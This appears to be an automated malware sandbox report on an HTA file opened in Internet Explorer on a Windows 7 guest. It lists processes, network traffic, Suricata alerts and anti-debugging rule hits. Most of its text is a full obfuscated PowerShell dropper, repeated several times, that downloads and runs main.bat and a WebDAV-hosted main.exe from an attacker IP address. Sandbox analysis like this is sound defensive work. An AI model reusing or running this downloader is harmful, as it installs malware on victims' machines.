Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 17, 2023, 10:49 a.m. | Oct. 17, 2023, 10:51 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\at.hta.html
2616-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
2932-
-
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
2488
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
www2.lunapic.com | 72.9.146.243 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49169 -> 72.9.146.243:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49170 -> 72.9.146.243:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 91.207.183.9:8000 -> 192.168.56.101:49171 | 2026989 | ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1 | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS entries
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
suspicious_features | GET request with no User-Agent header, connection made directly to an IP address | suspicious_request | GET http://91.207.183.9:8000/main.bat |
request | GET http://91.207.183.9:8000/main.bat |
file | C:\Users\test22\AppData\Roaming\main.bat |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe |
Data received | |
Data received | F |
Data received | HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 01:50:15 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1 |
Data received | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe |
Data sent | s oe-èKJgÿ\ý)ö¼_hIJZÌêþ¯üè çZ / 5 ÀÀÀ À 2 8 .ÿ www2.lunapic.com |
Data sent | s oe-èLä ¤tlÞ£xoÃån"¶tÐ}*ʧþ / 5 ÀÀÀ À 2 8 .ÿ www2.lunapic.com |
Data sent | GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2616 CREDAT:145409 |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
host | 91.207.183.9 |
file | C:\Users\test22\AppData\Roaming\main.bat |
parent_process | iexplore.exe | martian_process | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
parent_process | iexplore.exe | martian_process | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return 